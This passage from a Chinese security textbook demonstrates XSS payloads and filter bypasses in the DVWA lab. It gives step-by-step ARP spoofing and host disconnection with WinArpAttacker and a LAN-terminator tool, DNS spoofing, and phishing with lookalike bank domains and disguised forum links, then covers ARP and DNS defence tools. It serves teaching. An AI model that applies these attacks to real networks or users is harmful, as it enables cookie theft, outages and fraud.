Step05单击“提交”按钮，即可弹出如图 10-38所示的信息提示框，并将数据存入数据库。 

Step06查看网页源码可以看到语句已经嵌入代码中，如图 10-39所示。这样等到别的客户端请
求这个留言时，会将数据取出并在显示留言时执行攻击代码。

　　　　


图 10-38 信息提示框图 10-39 查看网页源码 

Step07在输入框中输入 <script>alert（document.cookie）</script>，如图 10-40所示。 

Step08单击“提交”按钮，即可在弹出的信息框中显示 Cookie信息，如图 10-41所示。

　　


　　图 10-40 输入 JavaScript语句　　　图 10-41 查看 Cookie信息 
10.3.3.存储型 XSS
存储型 XSS又被称为持久型 XSS，存储型 XSS是最危险的一种跨站脚本。存储型 XSS可以出现的地方更多，在任何一个允许用户存储的 Web应用程序中都可能会出现存储型 XSS漏洞。下面演示存储型 XSS的攻击过程，具体的操作步骤如下。

Step01在 DVWA工作界面中选择 XSS（存储型）选项，进入 XSS（存储型）操作界面，如图 
10-42所示。

图 10-42 XSS（存储型）操作界面 1 

Step02在文本框中输入 JavaScript语句，这里发现名字的长度受限制，这里需要将 maxlength属性值修改为“100000”，表示名称的长度不受限制，如图 10-43所示。

图 10-43 修改 maxlength属性值 

Step03在名称和浏览文本框中输入 JavaScript语句，如图 10-44所示。 

Step04单击“提交留言”按钮，即可弹出如图 10-45所示的信息提示框，表示语句执行成功。

　　


　　　　　　　图 10-44 输入 JavaScript语句图 10-45 信息提示框 1 

Step05修改 JavaScript语句为 <script>alert（/xss/）</script>，如图 10-46所示。 

Step06单击“提交留言”按钮，在弹出好几次 hello之后，才会弹出信息提示框，如图 10-47
所示。

　　　　


　　　　　　图 10-46 修改 JavaScript语句　　图 10-47 信息提示框 2 

Step07返回 DVWA中的 XSS（存储型）操作界面，可以看到存储型 XSS之前输入的信息依旧
还在，如图 10-48所示。这也是反射型 XSS与存储型 XSS之间最大的区别。

图 10-48 XSS（存储型）操作界面 2
这样，当攻击者提交一段 XSS代码后，被服务器端接收并存储，当攻击者再次访问某个页面时，这段 XSS代码被程序读出来响应给浏览器，造成 XSS跨站攻击。 
10.3.4.基于 DOM的 XSS 
DOM的全称为 Document Object Model，即文档对象模型， DOM通常用于代表在 HTML、 XHTML和 XML中的对象。使用 DOM可以允许程序和脚本动态地访问和更新文档的内容。 DOM型 XSS其实是一种特殊类型的反射型 XSS，它是基于 DOM文档对象模型的一种漏洞。
下面演示基于 DOM的 XSS的攻击过程，具体的操作步骤如下。 

Step01在 DVWA工作界面中选择 XSS（DOM型）选项，进入 XSS（DOM型）操作界面，如
图 10-49所示。 

Step02在 DVWA工作界面中单击“查看源代码”按钮，在打开的界面中可以看到 DOM XSS
服务器端没有任何 PHP代码，执行命令的只有客户端的 JavaScript代码，如图 10-50所示。 
Step03选择一种语言，这里选择 English，可以看到地址栏中 default的值为 English，如图 10-51所示。 
Step04修改地址栏中 default的值为“<script>alert（/xss/）</script>”，如图 10-52所示。 

Step05运行浏览器，即可弹出如图 10-53所示的信息提示框，语句执行成功。

图 10-49 XSS（DOM型）操作界面

　　


图 10-50 查看源代码界面　　　　　　图 10-51 选择一种语言

　　　


　　　　　　　图 10-52 修改 default的值　　　　图 10-53 运行结果 
10.4.跨站脚本攻击的防范 
XSS漏洞的起因是没有对用户提交的数据进行严格的过滤处理。因此在思考解决 XSS漏洞的

时候，我们应该重点把握如何才能更好地将用户提交的数据进行安全过滤。下面就来对跨站攻击方微视频式的相关代码进行分析。
1.过滤“<”和“>”标记

跨站脚本攻击的目标，是引入 Script代码在目标用户的浏览器内执行。最直接的方法，就是完全控制播放一个 HTML标记，如输入“<script>alert("/跨站攻击 /")</script>”之类的语句。但是很多程序早已针对这样的攻击进行了过滤，最简单安全的过滤方法就是转换“ <”和“ >”标记，从而截断攻击者输入的跨站代码。相应的过滤代码如下所示： 

2. HTML标记属性过滤

上面的两句代码可以过滤掉 “<”和“>”标记，让攻击者没有办法构造自己的 HTML标记。但是，攻击者有可能会利用已经存在的属性，如攻击者可以通过插入图片功能，将图片的路径属性修改为一段 Script代码。
攻击者插入的图片跨站语句，经过程序的转换后，变成了如下形式，如图 10-54所示。 

图 10-54 图片跨站
上面的这段代码执行后，同样会实现跨站的目的，而且很多的 HTML标记里属性都支持 “javascript:跨站代码”的形式，所以有很多的网站程序也意识到了这个漏洞，对攻击者输入的数据进行了如下的转换： 

在这段过滤代码中，用了大量的 replace函数过滤替换用户输入的 JavaScript脚本属性字符，一旦用户输入的语句中包含有 JavaScript jscript或 vbscript等，都会被替换成空白。 
3.过滤特殊的字符：&、回车和空格

其实上面的过滤还是不完全的，因为 HTML属性的值可支持“ &#ASCii”的形式进行表示，如
前面的跨站代码可以换成如下代码，如图 10-55所示。 

图 10-55 转换代码后继续跨站
转换代码后，即可突破过滤程序继续进行跨站攻击。于是，有安全意识的程序，又会继续对此漏洞进行弥补过滤，使用如下代码： 

上面这段代码将“ &”符替换成了“ &#x26;”，于是后面的语句便全部变形失效了。但是攻击者又可能采用另外的方式绕过过滤，因为过滤关键字的方式漏洞是很多的。攻击者可能会构造下面的攻击代码，如图 10-56所示。 

图 10-56 Tab逃脱过滤
在这里， javascript被空格隔开了，准确地说，这个空格是用 Tab键产生的，这样关键字 javascript就被拆分了。上面的过滤代码又失效了，一样可以进行跨站攻击。于是很多程序设计者又开始考虑将 Tab空格过滤，防止此类的跨站攻击。 
4. HTML属性跨站的彻底防范

如果程序设计者彻底过滤了各种危险字符，确实给攻击者进行跨站入侵带来了麻烦，不过攻击者依然还是可以利用程序的缺陷进行攻击的。因为攻击者可以利用前面说到的属性和事件机制，构造执行 Script代码。比如有下面这样一个图片标记代码，执行该 HTML代码后，可看到结果是 Script代码被执行了，如图 10-57所示。 


图 10-57 onerror事件跨站
这是一个利用 onerror事件的典型跨站攻击示例，于是许多程序设计者对此事件进行了过滤，一旦程序发现关键字 onerror，就会进行转换过滤。
然而攻击者可利用的事件跨站方法并不只有 onerror一种，各种各样的属性都可以构造跨站攻击。例如下面的这段代码： 

这样的事件属性，同样是可以实现跨站攻击的。可以注意到，在 src="#"和 style之间有一个空格，也就是说属性之间需要用空格分隔，于是程序设计者可能对空格进行过滤，以防此类的攻击。但是过滤了空格之后，同样可以被攻击者突破。攻击者可能构造如下代码，执行这段代码后，可看到结果如图 10-58所示。 

图 10-58 突破空格的属性跨站
这段代码是利用了一个脚本语言的规则漏洞，在脚本语言中的注释会被当作一个空白来表示，所以注释代码“/**/”就间接达到了原本的空格效果，从而使语句继续执行。
出现上面这些攻击，是因为用户越权自己所处的标签，造成用户输入数据与程序代码的混淆。所以，保证程序安全的办法，就是限制用户输入的空间，让用户在一个安全的空间内活动。
其实，只要在过滤了 “<”和“>”标记后，就可以把用户的输入在输出的时候放到双引号 “""”，以防用户跨越许可的标记。
另外，再过滤掉空格和 Tab键就不用担心关键字被拆分绕过了。最后，还要过滤掉 script关键字，并转换掉 &，防止用户通过 &#这样的形式绕过检查。
只要注意到上面的这几点过滤，就可以基本保证网站程序的安全性，不被跨站攻击了。当然，对于程序员来说，漏洞是难免出现的，要彻底地保证安全，舍弃 HTML标签功能是最保险的解决方法。不过，这也许就会让程序少了许多漂亮的效果。
10.5.实战演练 

10.5.1.实战1：删除 Cookie信息 
Cookie是 Web服务器发送到计算机里的数据文件，它记录了用户名、口令及其他一些信息。
微视频特别目前在许多网站中，Cookie文件中的 Username和 Password是不加密的明文信息，就更容易泄密。因此，在离开时删除 Cookie内容是非常必要的。用户可以通过“Internet选项”对话框中的相关功能实现删除 Cookie，具体的操作步骤如下。 


“Internet选项”对话框，选择“常规”选项卡，在“浏览历史记录”选项区域中单击“删
除”按钮，如图 10-59所示。 

Step02打开“删除浏览历史记录”对话框，在其中勾选 “Cookie和网站数据”复选框，单击“删
除”按钮，即可清除 IE浏览器中的 Cookie文件，如图 10-60所示。


　　　　


　　　图 10-59 “常规”选项卡图 10-60 “删除浏览历史记录”对话框 

10.5.2.实战2：一招解决弹窗广告
在浏览网页时，除了遭遇病毒攻击、网速过慢等问题外，还时常遭受铺天盖地的广告攻击，利
微视频用 IE自带工具可以屏蔽广告。具体的操作步骤如下。 

Step01打开“ Internet选项”对话框，在“安全”选项卡中单击“自定义级别”按钮，如
图 10-61所示。 

Step02打开“安全设置”对话框，在“设置”列表框中将“活动脚本”设为“禁用”，如
图 10-62所示。单击“确定”按钮，即可屏蔽一般的弹出窗口。
提示：还可以在“Internet选项”对话框中选择“隐私”选项卡，勾选“启用弹出窗口阻止程序”复选框，如图 10-63所示。单击“设置”按钮，弹出“弹出窗口阻止程序设置”对话框，将组织级别设置为“高”，如图 10-64所示。最后单击“确定”按钮，即可屏蔽弹窗广告。


　　　　


　　图 10-61 “安全”选项卡图 10-62 “安全设置”对话框

　


图 10-63 “隐私”选项卡图 10-64 设置组织级别

11第 
章




网络欺骗攻击的防范
网络欺骗是入侵系统的主要手段；捕获数据网络是利用计算机的网络接口截获计算机数据报文的一种手段。本章介绍网络欺骗的攻击方法以及网络数据的追踪与捕获。 
11.1.常见的网络欺骗攻击
一个黑客在真正入侵系统时，并不是依靠别人写的什么软件，更多是靠对系统和网络的深入了解来达到这个目的，从而出现了形形色色的网络欺骗攻击，如常见的 ARP欺骗、 DNS欺骗、主机欺骗、钓鱼网站欺骗等。 
11.1.1.ARP欺骗攻击 
ARP欺骗是黑客常用的攻击手段之一。 ARP欺骗分为两种，一种是对路由器 ARP表的欺骗；
微视频另一种是对内网 PC的网关欺骗，ARP欺骗容易造成客户端断网。 
1. ARP欺骗的工作原理

假设一个网络环境中，网内有三台主机，分别为主机 A、B、C。主机详细信息描述如下。 A的地址为：IP:192.168.0.1 MAC: 00-00-00-00-00-00 B的地址为：IP:192.168.0.2 MAC: 11-11-11-11-11-11 C的地址为：IP:192.168.0.3 MAC: 22-22-22-22-22-22 正常情况下是 A和 C之间进行通信，但此时 B向 A发送一个自己伪造的 ARP应答，而这个
应答中发送方 IP地址是 192.168.0.3（C的 IP地址），MAC地址是 11-11-11-11-11-11（C的 MAC地址本来应该是 22-22-22-22-22-22，这里被伪造了）。当 A接收到 B伪造的 ARP应答，就会更新本地的 ARP缓存（A被欺骗了），这时 B就伪装成 C了。
同时，B同样向 C发送一个 ARP应答，应答包中发送方 IP地址是 192.168.0.1（A的 IP地址）， 
MAC地址是 11-11-11-11-11-11（A的 MAC地址本来应该是 00-00-00-00-00-00），当 C收到 B伪造
的 ARP应答，也会更新本地 ARP缓存（ C也被欺骗了），这时 B就伪装成了 A。这样主机 A和 C
都被主机 B欺骗，A和 C之间通信的数据都经过了 B，主机 B完全可以知道 A和 C之间说了什么。
这就是典型的 ARP欺骗过程。 
2.遭受 ARP攻击后现象 

ARP欺骗木马的中毒现象表现为：使网络中的计算机突然掉线，过一段时间后又会恢复正常。比如用户频繁断网、 IE浏览器频繁出错，以及一些常用软件出现故障等。如果局域网中是通过身份认证上网的，会突然出现可认证但不能上网的现象（无法 ping通网关），重启计算机或在 MS-DOS窗口下运行命令 arp-d后，又可恢复上网。 
ARP欺骗木马只需成功感染一台计算机，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。 
3. 开始进行 ARP欺骗攻击

使用 WinArpAttacker工具可以对网络进行 ARP欺骗攻击，除此之外，利用该工具还可以实现对 ARP机器列表的扫描。具体的操作步骤如下。 

Step01下载 WinArpAttacker软件，双击其中的 WinArpAttacker.exe程序，即可打开 WinArp-Attacker主窗口，选择“扫描”→“高级”命令，如图 11-1所示。 

Step02打开“扫描”对话框，从中可以看出有扫描主机、扫描网段、多网段扫描 3种扫描方式，
如图 11-2所示。

　　


图 11-1 WinArpAttacker主窗口图 11-2 “扫描”对话框 

Step03在“扫描”对话框中选中“扫描主机”单选按钮，并在后面的文本框中输入目标主机的 
IP地址，如 192.168.0.104，然后单击“扫描”按钮，即可获得该主机的 MAC地址，如图 11-3所示。 

Step04选中“扫描网段”单选按钮，在 IP地址范围的文本框中输入扫描的 IP地址范围，如
图 11-4所示。



　　
图 11-3 主机的 MAC地址图 11-4 输入扫描 IP地址范围

Step05单击“扫描”按钮即可进行扫描操作，当扫描完成时会出现一个 Scaning successfully!对话框，如图 11-5所示。 

Step06依次单击“确定”按钮，返回到 WinArpAttacker主窗口中，在其中即可看到扫描结果，如图 11-6所示。

　


图 11-5 Scaning successfully!对话框	图 11-6 扫描结果 

Step07在扫描结果中勾选要攻击的目标计算机前面的复选框，然后在 WinArpAttacker主窗口中单击“攻击”下拉按钮，在弹出的菜单中选择任意命令就可以对其他计算机进行攻击了，如图 11-7所示。

图 11-7 “攻击”菜单
在 WinArpAttacker中有以下 6种攻击方式。 

●	不断 IP冲突：不间断的 IP冲突攻击， FLOOD攻击默认是一千次，可以在选项中改变这个数值。FLOOD攻击可使对方机器弹出 IP冲突对话框，导致死机。 

●	禁止上网：禁止上网，可使对方机器不能上网。 

●	定时 IP冲突：定时的 IP冲突。


●	监听网关通讯：监听选定机器与网关的通信，监听对方机器的上网流量。发动攻击后用抓包软件来抓包看内容。 

●	监听主机通讯：监听选定的几台机器之间的通信。 

●	监听网络通讯：监听整个网络任意机器之间的通信。这个功能过于危险，可能会把整个网


络搞乱，建议不要乱用。 
Step08如果选择“不断 IP冲突”选项，即可使目标计算机不断弹出“ IP地址与网络上的其他
系统有冲突。”提示框，如图 11-8所示。 

Step09如果选择“禁止上网”选项，此时在 WinArpAttacker主窗口就可以看到该主机的“攻击”属性就变为 BanGateway。如果想停止攻击，则需在 WinArpAttacker主窗口选择“攻击”→“停止攻击”命令进行停止，否则将会一直进行，如图 11-9所示。


　

图 11-8 IP冲突信息	图 11-9 停止攻击 

Step10在 WinArpAttacker主窗口中单击“发送”按钮，即可打开“手动发送 ARP包”对话框，在其中设置目标硬件 Mac、ARP方向、源硬件 Mac、目标协议 Mac、源协议 Mac、目标 IP和源 IP等属性后，单击“发送”按钮，即可向指定的主机发送 ARP数据包，如图 11-10所示。 

Step11在 WinArpAttacker主窗口中选择“设置”菜单，然后在弹出的菜单中选择任意命令即可打开“Options（选项）”对话框，在其中对各个选项卡进行设置，如图 11-11所示。


　　

　　图 11-10 “手动发送 ARP包”对话框	　图 11-11 “（选项）”对话框

11.1.2.DNS欺骗攻击 
DNS欺骗即域名信息欺骗是常见的 DNS安全问题。当一个 DNS服务器掉入陷阱，使用了来自一个恶意 DNS服务器的错误信息，那么该 DNS服务器就被欺骗了。在 Windows 10系统中，用户可以在“命令提示符”窗口中输入 nslookup命令来查询 DNS服务器的相关信息，如图 11-12所示。 
1. DNS欺骗原理

如果可以冒充域名服务器，再把查询的 IP地址设置为攻击者的 IP地址，用户上网就只能看到攻击者的主页，而不是用户想去的网站的主页，这就是 DNS欺骗的基本原理。 DNS欺骗并不是要黑掉对方的网站，而是冒名顶替，从而实现其欺骗目的。和 IP欺骗相似， DNS欺骗的技术在实现上仍有一定的困难，为克服这些困难，有必要了解 DNS查询包的结构。
在 DNS查询包中有个标识 IP，其作用是鉴别每个 DNS数据包的印记，从客户端设置，由服务器返回，使用户匹配请求与相应。如某用户在 IE浏览器地址栏中输入 www.baidu.com，如果黑客想通过假的域名服务器（如 220.181.6.20）进行欺骗，就要在真正的域名服务器（如 220.181.6.18）返回响应前，先给出查询的 IP地址，如图 11-13所示。
图 11-12 查询 DNS服务器


图 11-13 DNS欺骗示意图
图 11-13很直观，就是在真正的域名服务器 220.181.6.18之前，黑客给用户发送一个伪造的 DNS信息包。但在 DNS查询包中有一个重要的域，就是标识 ID，如果要发送伪造的 DNS信息包不被识破，就必须伪造出正确的 ID。如果无法判别该标记， DNS欺骗将无法进行。只要在局域网上安装有嗅探器，通过嗅探器就可以知道用户的 ID。但要是在 Internet上实现欺骗，就只有发送大量一定范围的 DNS信息包，来提高得到正确 ID的机会。 
2. DNS欺骗的方法

网络攻击者通常通过以下三种方法进行 DNS欺骗。
（1）缓存感染。黑客会熟练地使用 DNS请求，将数据放入一个没有设防的 DNS服务器的缓存当中。这些缓存信息会在客户进行 DNS访问时返回给客户，从而将客户引导到入侵者所设置的运行木马的 Web服务器或邮件服务器上，然后黑客从这些服务器上获取用户信息。

（2）DNS信息劫持。入侵者通过监听客户端和 DNS服务器的对话，通过猜测服务器响应给客户端的 DNS查询 ID。每个 DNS报文包括一个相关联的 16位 ID号，DNS服务器根据这个 ID号获取请求源位置。黑客在 DNS服务器之前将虚假的响应交给用户，从而欺骗客户端去访问恶意的网站。


（3）DNS重定向。攻击者能够将 DNS名称查询重定向到恶意 DNS服务器，这样攻击者可以
获得 DNS服务器的写权限。防范 DNS欺骗攻击可采取如下两种措施。
（1）直接用 IP访问重要的服务，这样至少可以避开 DNS欺骗攻击。但这需要记住要访问的 IP地址。

（2）加密所有对外的数据流，对服务器来说就是尽量使用 SSH之类的有加密支持的协议，对一般用户应该用 PGP之类的软件加密所有发到网络上的数据。但这也并不是容易的事情。 


11.1.3.主机欺骗攻击
局域网终结者是用于攻击局域网中计算机的一款软件，其作用是构造虚假 ARP数据包欺骗网

络主机，使目标主机与网络断开。微视频
使用局域网终结者欺骗网络主机的具体操作步骤如下。 

Step01在“命令提示符”窗口中输入 Ipconfig命令，按 Enter键，即可查看本机的 IP地址，如图 11-14所示。 

Step02在“命令提示符”窗口中输入 ping 192.168.0.135 -t命令，按 Enter键，即可检测本机与目标主机之间是否连通，如果出现相应的数据信息，则表示可以对该主机进行 ARP欺骗攻击，如图 11-15所示。

　


　　图 11-14 查看本机的 IP地址图 11-15 检测连接是否连通 

Step03如果出现“请求超时”提示信息，则说明对方已经启用防火墙，此时就无法对主机进行 
ARP欺骗攻击，如图 11-16所示。 

Step04运行“局域网终结者”主程序后，打开“局域网终结者”主窗口，如图 11-17所示。


　　　　　


　　图 11-16 “请求超时”提示信息图 11-17 “局域网终结者”主窗口 


文本框中输入要控制目标主机的 IP地址，然后单击“添加到阻断列表”按钮，
即可将该 IP地址添加到“阻断”列表中，如果此时目标主机中出现 IP冲突的提示信息，则表示攻击成功，如图 11-18所示。
199


图 11-18 添加 IP地址到“阻断”列表 
11.1.4.钓鱼网站欺骗攻击
钓鱼网站通常指伪装成银行及电子商务，窃取用户提交的银行账号、密码等私密信息的网站。“钓鱼”是一种网络欺诈行为，指不法分子利用各种手段，仿冒真实网站的 URL地址以及页面内容，
或利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的 HTML代码，以此来骗取用
户银行或信用卡账号、密码等私人资料。
网络钓鱼的技术手段有多种，如邮件攻击、跨站脚本、网站克隆、会话截取等，但在各种网银
事件中，最常见的是克隆网站和 URL地址欺骗这两种手段，下面分别进行分析。 
1.克隆网站（也称伪造网站）

“克隆网站”其攻击形式被称作域名欺骗攻击，即网站的内容和真实的银行网站非常的相似，
而且非常简单，最致命的一点是通过网站克隆技术克隆的网站和真实的网站真假很难辨别，有时只
是在网站域名中有一些极细小的差别，不细心的用户就很容易上当。
进行网站克隆首先需要对网站的域名地址进行伪装欺骗，最常用的就是采用和真实银行的网址
非常相似的域名地址，如虚假的农业银行域名地址为 www.95569.cn和真实的网址 www.95599.cn只
有一个“ 6”字只差，不细心的用户很难发现。图 11-19所示即为真实农业银行网站与虚拟农业银行
网站的对比图。

　


图 11-19 真实农业银行网站与虚拟农业银行网站的对比图
另外，在其他银行中类似的情况也出现不少，如中国工商银行假冒的网站使很多用户上当受骗，其假冒的网站域名为 www.1cbc.com.cn，这与真实的网址 www.icbc.com.cn只有数字“ 1”和字母 i的不同，还有一些假冒的工商银行的网站地址 www.icbc.com只比真实的网址缺少 cn两个字母，不细心的用户根本不容易发现。如图 11-20所示即为真实工商银行网站与虚拟工商银行网站的对比图。



　

图 11-20 真实工商银行网站与虚拟工商银行网站的对比图
总之，网站克隆攻击很难被用户发现，一不小心就很容易上当受骗。除此之外，现在网站的域名管理也不是很严格，普通用户也可以申请注册域名，使得网站域名欺骗屡屡发生，给网银用户带来了极大的经济损失。但是，假的真不了，真的假不了，即使伪造的网站页面无论是网站的 Logo、图标、新闻和超级链接等内容都能连接到真实的网页，但在输入账号的位置处就会存在着与真实网站的不同之处，这是网站克隆攻击是否成功的关键所在。当用户输入自己的账号和密码时，网站会自动弹出一些不正常的窗口，如提示用户输入的账号或密码不正确，要求再次输入账号和密码的信息窗口等，如图 11-21所示。其实，在用户第一次输入账号和密码并提示输入错误时，该账号信息已经被网站后门程序记录下来并发送给黑客手中了。 
2. URL地址欺骗攻击 

URL全称为 Uniform Resource Locators，即统一资源定位器的意思，在地址栏中输入的网址就属于 URL的一种表达方式。基本上所有访问网站的用户都会使用到 URL，其作用非常强大，但也可以利用 URL地址进行欺骗攻击，即攻击者利用一定的攻击技术，构造虚假的 URL地址，当用户访问该地址的网页时，以为自己访问的是真实的网站，从而把自己的财务信息泄露出去，造成不严重的经济损失。
在使用该方法进行诱骗时，黑客们常常是通过垃圾邮件或在各种论坛网页中发布伪造的链接地址，进而使用户访问虚假的网站。伪造虚假的 URL地址的方法有多种，如起个具有诱惑性的网站名称、掉包易混的字母数字等，但最常用的还是利用 IE编码或 IE漏洞伪造 URL地址，该方法使得用户点击的链接与真实的网址不符，从而登录到黑客伪造的网站中。
这里举一个具体的实例来说明利用 URL伪造地址进行网上银行攻击的过程，具体的操作步骤如下。 

图 11-21 提示输入的账号或密码不正确


Step01在任意网上论坛中发布一个极具有诱惑性的帖子，其主题为“注册网上银行即可中 1万
元大奖！”，如图 11-22所示。 

Step02帖子内容中输入诱惑性的信息，并留下网上银行的链接地址，这个地址的作用是诱导用
户登录到自己伪造的网站中，并使用户误认为自己登录的网站地址是正确的，因此需要在帖子中加入如下代码“点击 <a href="http://www.baidu.com">中国农业银行网上银行 </a>，即可登录或注册网上银行就有可能中 1万元大奖！”，如图 11-23所示。



　
　　图 11-22 网上论坛页面图 11-23 输入帖子内容信息

Step03输入完毕后，单击“发表”按钮或在编辑框内按 Ctrl+Enter组合键发表帖子。在帖子发
表成功后，即可在网页中显示“中国农业银行网上银行”的信息，如图 11-24所示。 

Step04当用户点击“中国农业银行网上银行”链接时，打开的却是黑客伪造的网站，这里是
百度网页。如果把百度的网址换成黑客伪造的银行网站，那么用户就有可能上当受骗，如图 11-25所示。


　


　　　　图 11-24 发布帖子　　　　图 11-25 百度网页
提示：当然，这种欺骗方法是一种比较简单的方法，稍有一点上网经验的用户只需将鼠标放置在超级链接上，即可在下方的状态栏中看到实际所链接的网址，从而识破该欺骗形式。 

Step05为了进一步伪装 URL地址，还需要在真实的网上银行 URL地址中加入相关代码，如把
上述帖子内容修改为：点击 <a href="http://www.baidu.com">http://www.95599.cn/ </a>，即可登录或注册网上银行就有可能中 1万元大奖！，如图 11-26所示。 

Step06发帖成功后，在网页中将显示 http://www.95599.cn的链接地址，即使鼠标移动到链接地址上，在其窗口的状态栏中看起来依然连接到 http://www.95599.cn。但是到点击该链接后才发现打开的是伪装网站，如图 11-27所示。

　


图 11-26 伪装 URL地址图 11-27 发帖成功后的信息
总之，针对上述情况，用户在上网的过程中，一定要随时注意地址栏中 URL的变化，一旦发现地址栏中的域名发生变化就要引起高度的重视，从而避免自己上当受骗。
11.2.网络欺骗攻击的防范
针对形形色色的网络欺骗，大家也不要害怕，下面介绍几种防范网络欺骗攻击的方法与技巧。 
11.2.1.防御 ARP攻击
使用绿盾 ARP防火墙可以防御 ARP攻击。由于恶意 ARP病毒的肆意攻击， ARP攻击泛滥给

局域网用户带来巨大的安全隐患和不便。网络可能会时断时通，个人账号信息可能在毫不知情的情微视频况下就被攻击者盗取。绿盾 ARP防火墙能够双向拦截 ARP欺骗攻击包，监测锁定攻击源，时刻保护局域网用户计算机的正常上网数据流向，是一款适于个人用户的反 ARP欺骗保护工具。
使用绿盾 ARP防火墙的具体操作步骤如下： 


Step01下载并安装绿盾 ARP防火墙，打开其主窗口，在“运行状态”选项卡下可以看到攻击
来源主机 IP及 MAC、网关信息、拦截攻击包等信息，如图 11-28所示。 

Step02在“系统设置”选项卡下，选择“ ARP保护设置”选项，可以对绿盾 ARP防火墙各个
属性进行设置，如图 11-29所示。


　


　图 11-28 绿盾 ARP防火墙图 11-29 “系统设置”选项卡 

Step03如果选中“手工输入网关 MAC地址”单选按钮，然后单击“手工输入网关 MAC地址”
按钮，打开“网关 MAC地址输入”对话框，在其中输入网关 IP地址与 MAC地址。一定要把网关的 MAC地址设置正确，否则将无法上网，如图 11-30所示。 
Step04单击“添加”按钮，即可完成网关的添加操作，如图 11-31所示。


　　　　


图 11-30 “网关 MAC地址输入”对话框图 11-31 添加网关
提示：根据 ARP攻击原理，攻击者就是通过伪造 IP地址和 MAC地址来实现 ARP欺骗的，而绿盾 ARP防火墙的网关动态探测和识别功能可以识别伪造的网关地址，动态获取并分析判断后为运行 ARP防火墙的计算机绑定正确的网关地址，从而时刻保证本机上网数据的正确流向。
203


Step05选择“扫描限制设置”选项，在打开的界面中可以对扫描各个参数进行限制设置，如
图 11-32所示。 

Step06选择“带宽管理设置”选项，在打开的界面中可以启用公网带宽管理功能，在其中设置
上传或下载带宽限制值，如图 11-33所示。


　


　图 11-32 “扫描限制设置”选项　　　图 11-33 “带宽管理设置”选项 

Step07选择“常规设置”选项，在其中可以对常规选项进行设置，如图 11-34所示。 

Step08单击“设置界面弹出密码”按钮，弹出“密码设置”对话框，在其中可以对界面弹出密
码进行设置，输入完毕后，单击“确定”按钮即可完成密码的设置，如图 11-35所示。

　　　　


图 11-34 “常规设置”选项图 11-35 “密码设置”对话框
提示：在 ARP攻击盛行的当今网络中，绿盾 ARP防火墙不失为一款好用的反 ARP欺骗保护工具，使用该工具可以有效地保护自己的系统免遭欺骗。 

11.2.2.防御 DNS欺骗 
Anti ARP-DNS防火墙是一款可对 ARP和 DNS欺骗攻击实时监控和防御的防火墙。当受到 微视频ARP和 DNS欺骗攻击时，会迅速记录追踪攻击者并将攻击程度控制至最低，可有效防止局域网内的非法 ARP或 DNS欺骗攻击，还能解决被人攻击之后出现 IP冲突的问题。具体的操作步骤如下。 

Step01安装 Anti ARP-DNS防火墙后，打开其主窗口，可以看到在其中显示的网卡数据信息，
包括子网掩码、本地 IP以及局域网中其他计算机等信息。当启动防护程序后，该软件就会把本机 MAC地址与 IP地址自动绑定实施防护，如图 11-36所示。
提示：当遇到 ARP网络攻击后，软件会自动拦截攻击数据，系统托盘图标此时呈现闪烁性图标来警示用户，另外在日志里也将记录当前攻击者的 IP和 MAC攻击者的信息及攻击来源。 

Step02单击“广播源列”按钮，即可看到广播来源的相关信息，如图 11-37所示。


　


　图 11-36 Anti ARP-DNS防火墙　　图 11-37 广播来源列表 

Step03单击“历史记录”按钮，即可看到受到 ARP攻击的详细记录。另外，在下面的 IP地址
文本框中输入 IP地址之后，单击“查询”按钮，即可查出其对应的 MAC地址，如图 11-38所示。 

Step04单击“基本设置”按钮，即可看到相关的设置信息，在其中设置各个选项的属性，如图 
11-39所示。


　


　　图 11-38 “历史记录”界面　　　图 11-39 “基本设置”界面
提示： AntiARP-DNS提供了比较丰富的设置菜单，如主要功能、副功能等。除可用预防掉线断网情况外，还可以识别由 ARP欺骗造成的“系统 IP冲突”情况，而且还增加了自动监控模式。 

Step05单击“本地防御”按钮，即可看到“本地防御欺骗”选项卡，在其中根据 DNS绑定
功能可屏蔽不良网站，如用户所在的网站被 ARP挂马等，可以找出页面进行屏蔽。其格式是： 
127.0.0.1 www.xxx.com。同时该网站还提供了大量的恶意网站域名，用户可根据情况进行设置，如图 11-40所示。 

Step06单击“本地安全”按钮，即可显示“本地安全”界面，在其中可以扫描本地计算机中存
在的危险进程，如图 11-41所示。


　


　图 11-40 “本地防御”界面图 11-41 “本地安全”界面 
11.3.网络信息的捕获
随着网络应用技术的发展，如何保护网络生活的隐私越来越引起了人们的重视，有什么办法可以使用户躲避多变的网络追踪和攻击呢？实际上，使用好代理工具，实现通过跳板访问网络，就可以轻松实现这一目标。 
11.3.1.捕获的网络数据包
网络特工可以监视与主机相连 HUB上所有机器收发的数据包；还可以监视所有局域网内的机

微视频器上网情况，以对非法用户进行管理，并使其登录指定的 IP网址。使用网络特工的具体操作步骤如下。 

Step01下载并运行其中的“网络特工 .exe”程序，即可打开“网络特工”主窗口，如图 11-42所示。 

Step02选择“工具”→“选项”命令，即可打开“选项”对话框，在其中设置相应的属性。在
其中设置“启动”“全局热键”等属性，如图 11-43所示。


　　

图 11-42 “网络特工”主窗口图 11-43 “选项”对话框 

Step03在“网络特工”主窗口左边的列表中单击“数据监视”选项，即可打开“数据监视”窗口。
在其中设置要监视的内容后，单击“开始监视”按钮，即可进行监视，如图 11-44所示。 

Step04在“网络特工”主窗口左边的列表中右击“网络管理”选项，在弹出的快捷菜单中选择“添
加新网段”命令，即可打开“添加新网段”对话框，如图 11-45所示。

　　


　　　　　　图 11-44 捕获网络数据包图 11-45 “添加新网段”对话框 

Step05在设置网段的开始 IP地址、结束 IP地址、子网掩码、网关 IP地址之后，单击 OK按钮，
即可在“网络特工”主窗口左边的“网络管理”选项中看到新添加的网段，如图 11-46所示。 

Step06双击该网段，即可在右边打开的窗口中，看到新添加网段中所有的信息，如图 11-47
所示。


　


图 11-46 添加的网段图 11-47 数据信息 

Step07单击其中的“管理参数设置”按钮，即可打开“管理参数设置”对话框，在其中对各个
网络参数进行设置，如图 11-48所示。 

Step08单击“网址映射列表”按钮，即可打开“网址映射列表”对话框，如图 11-49所示。 

Step09在“DNS服务器 IP”文本区域中选中要解析的 DNS服务器后，单击“开始解析”按钮，
即可对选中的 DNS服务器进行解析，待解析完毕后，即可看到该域名对应的主机地址等属性，如图 11-50所示。 

Step10在“网络特工”主窗口左边的列表中单击“互联星空”选项，即可显示“互联星空”窗口，
在其中即可进行扫描端口和 DHCP服务操作，如图 11-51所示。


　


图 11-48 “管理参数设置”对话框图 11-49 “网址映射列表”对话框


　


